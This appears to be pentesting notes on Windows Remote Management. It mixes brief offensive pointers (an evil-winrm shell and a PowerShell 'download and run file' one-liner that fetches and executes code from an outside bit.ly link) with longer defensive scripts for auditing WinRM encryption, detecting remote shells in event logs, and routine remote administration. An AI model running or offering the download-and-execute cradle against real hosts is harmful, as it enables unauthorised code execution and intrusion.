Port 5985, 5986

If port 5985 is open but port 5986 is closed, the WinRM service is configured to accept connections over HTTP only, so transport-level encryption (TLS) is not enabled on the listener.
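The port check above is an external view; on the host itself you can read the same facts from the WSMan drive. The script below is an added example (not part of the original notes) that lists the configured listeners and the two service settings that decide whether anything on 5985 crosses the wire in the clear. It must run in an elevated PowerShell, and the certificate thumbprint in the commented remediation step is an assumed placeholder.

```powershell
# Added example: audit local WinRM listeners and encryption-related settings.
# Read-only by default; the remediation at the end is commented out.

# 1. Enumerate listeners. Each child of WSMan:\localhost\Listener is one listener
#    whose properties (Transport, Address, Port, Enabled, ...) are its own children.
$listeners = Get-ChildItem WSMan:\localhost\Listener | ForEach-Object {
    $props = Get-ChildItem $_.PSPath
    [pscustomobject]@{
        Transport = ($props | Where-Object Name -eq 'Transport').Value
        Address   = ($props | Where-Object Name -eq 'Address').Value
        Port      = ($props | Where-Object Name -eq 'Port').Value
        Enabled   = ($props | Where-Object Name -eq 'Enabled').Value
    }
}
$listeners | Format-Table -AutoSize

$hasHttps = $listeners | Where-Object { $_.Transport -eq 'HTTPS' -and $_.Enabled -eq 'true' }

# 2. Service-level settings. AllowUnencrypted=true lets clients send SOAP bodies
#    without Negotiate/Kerberos message encryption; Basic auth over plain HTTP
#    would expose base64-encoded credentials.
$allowUnencrypted = (Get-Item WSMan:\localhost\Service\AllowUnencrypted).Value
$basicAuth        = (Get-Item WSMan:\localhost\Service\Auth\Basic).Value

if (-not $hasHttps) {
    Write-Warning 'No enabled HTTPS listener: WinRM on 5985 has no TLS transport protection.'
}
if ($allowUnencrypted -eq 'true') {
    Write-Warning 'AllowUnencrypted is true: payloads may cross the wire in plaintext.'
}
if ($basicAuth -eq 'true') {
    Write-Warning 'Basic authentication is enabled on the service.'
}

# 3. Remediation: bind an HTTPS listener (5986) to a server certificate and refuse
#    unencrypted traffic. $CertThumbprint is an assumed placeholder.
# $CertThumbprint = 'REPLACE_WITH_REAL_THUMBPRINT'
# New-Item -Path WSMan:\localhost\Listener -Transport HTTPS -Address * `
#          -CertificateThumbPrint $CertThumbprint -Force
# Set-Item WSMan:\localhost\Service\AllowUnencrypted -Value $false
```

Even with only the HTTP listener, domain clients normally negotiate Kerberos and the SOAP body is still encrypted at the message level; the audit flags the combination (no HTTPS, AllowUnencrypted, or Basic) where that protection is actually gone.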

Evil WinRM

Hackplayers/evil-winrm

Get a shell via evil-winrm
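Whatever client opens the session, evil-winrm or a stock PowerShell, the server side looks the same: a WSMan shell is created and WinRM spawns a wsmprovhost.exe host process for it. The following added example (not from the original notes) pulls both traces from the local event logs so a defender can see who got a shell over WinRM. The one-day window is an assumption; Event ID 4688 only appears if process-creation auditing is enabled.

```powershell
# Added example: surface remote shells created through WinRM on this host.
$since = (Get-Date).AddDays(-1)   # assumed look-back window

# a) WinRM's own operational log records shell creation as Event ID 91.
$shellEvents = Get-WinEvent -FilterHashtable @{
    LogName   = 'Microsoft-Windows-WinRM/Operational'
    Id        = 91
    StartTime = $since
} -ErrorAction SilentlyContinue

$shellEvents | ForEach-Object {
    [pscustomobject]@{
        Time    = $_.TimeCreated
        UserSid = $_.UserId          # SID of the authenticated caller
        Message = $_.Message
    }
} | Format-Table -AutoSize -Wrap

# b) Process creation: every remote PowerShell shell runs inside wsmprovhost.exe,
#    whose parent is the WinRM svchost. Requires audit of process creation (4688).
$hosts = Get-WinEvent -FilterHashtable @{
    LogName   = 'Security'
    Id        = 4688
    StartTime = $since
} -ErrorAction SilentlyContinue | ForEach-Object {
    # Flatten EventData into a hashtable so fields can be read by name.
    $x = [xml]$_.ToXml()
    $d = @{}
    foreach ($n in $x.Event.EventData.Data) { $d[$n.Name] = $n.'#text' }
    if ($d.NewProcessName -like '*\wsmprovhost.exe') {
        [pscustomobject]@{
            Time    = $_.TimeCreated
            Account = "$($d.SubjectDomainName)\$($d.SubjectUserName)"
            Process = $d.NewProcessName
        }
    }
}
$hosts | Format-Table -AutoSize
```

A wsmprovhost.exe launch for an account that never administers the box, or outside maintenance windows, is the signal worth alerting on; forwarding these two logs to a SIEM gives the same view fleet-wide.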

Powershell Shells

Download and run file:

iex(New-Object Net.WebClient).DownloadString('http://bit.ly/1kEgbuH')

PowerShell For Pentesters Part 1: Introduction to PowerShell and Cmdlets

WinRM

Windows Remote Management (WinRM) is a Microsoft protocol that allows remote management of Windows machines over HTTP(S) using SOAP. On the back end it uses WMI, so you can think of it as an HTTP-based API for WMI.

If WinRM is enabled on the machine, it's trivial to administer it remotely from PowerShell. In fact, you can drop straight into a remote PowerShell session on the machine (as if you were using SSH!).
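The SSH-like workflow just described, from the administrator's side, as an added example that is not part of the original notes. It assumes $Target is a domain-joined host you manage, that your account is in its local Administrators or Remote Management Users group, and that Kerberos is available so no password is typed.

```powershell
# Added example: connect to a managed host over WinRM with PowerShell remoting.
$Target = 'srv01.corp.example'   # assumed hostname

# Does the WinRM service answer a WS-Management Identify request?
Test-WSMan -ComputerName $Target -ErrorAction Stop | Select-Object ProductVersion

# Interactive session on 5985 (HTTP transport; Kerberos encrypts the messages):
# Enter-PSSession -ComputerName $Target
# Same thing on 5986 once an HTTPS listener exists:
# Enter-PSSession -ComputerName $Target -UseSSL

# Non-interactive: run a script block remotely and receive objects, not text.
$session = New-PSSession -ComputerName $Target
try {
    $info = Invoke-Command -Session $session -ScriptBlock {
        [pscustomobject]@{
            Host      = $env:COMPUTERNAME
            User      = "$env:USERDOMAIN\$env:USERNAME"
            Uptime    = (Get-Date) - (Get-CimInstance Win32_OperatingSystem).LastBootUpTime
            Listeners = (Get-ChildItem WSMan:\localhost\Listener).Name -join ', '
        }
    }
    $info | Format-List
}
finally {
    Remove-PSSession $session   # always tear down the remote runspace
}
```

Because the remote code runs inside wsmprovhost.exe under your identity, the same Event ID 91 and 4688 records a defender looks for will be produced by this session too.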